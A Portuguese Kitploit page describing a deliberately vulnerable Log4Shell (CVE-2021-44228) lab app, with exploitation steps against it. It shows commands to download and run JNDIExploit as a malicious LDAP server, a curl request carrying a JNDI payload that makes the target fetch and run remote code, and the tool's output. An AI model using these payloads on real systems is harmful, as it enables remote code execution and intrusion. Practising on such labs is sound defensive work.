Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4shell-vulnerable-app — Aplicação web Spring Boot vulnerável ao Log4Shell (CVE-2021-44228). | Kitploit
Ferramentas/GitHubGitHub/prmawyer/log4shell-vulnerable-app
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubprmawyer/log4shell-vulnerable-app

log4shell-vulnerable-app

Aplicação web Spring Boot vulnerável ao Log4Shell (CVE-2021-44228).

Ver Repositório
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Aplicação vulnerável de exemplo Log4Shell (CVE-2021-44228) - editada duas vezes

Este repositório contém uma aplicação web Spring Boot vulnerável ao CVE-2021-44228, apelidada de Log4Shell.

Ela usa Log4j 2.14.1 (através do spring-boot-starter-log4j2 2.6.1) e o JDK 1.8.0_181.

Executando a aplicação

Execute:

root@kitploit:~
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929

Passos de exploração

Nota: Isto é altamente inspirado no aviso original da LunaSec. Execute por sua conta e risco, de preferência em uma VM em um ambiente isolado.

Atualização (13 de dezembro):

O repositório JNDIExploit foi removido do GitHub (presumivelmente, não pelo GitHub)... Clique Aqui para baixar a versão em cache pelo Wayback Machine.
  • Use o JNDIExploit para iniciar um servidor LDAP malicioso
root@kitploit:~
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
  • Em seguida, acione o exploit usando:
root@kitploit:~
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  • Observe a saída do JNDIExploit, mostrando que ele enviou uma resposta LDAP maliciosa e serviu o payload de segundo estágio:
root@kitploit:~
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
  • Para confirmar que a execução do código foi bem-sucedida, observe que o arquivo /tmp/pwned.txt foi criado no contêiner executando a aplicação vulnerável:
root@kitploit:~
$ docker exec vulnerable-app ls /tmp
...
pwned
...

Referência

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

Contribuidores

@christophetd @rayhan0x01

Baixar ferramenta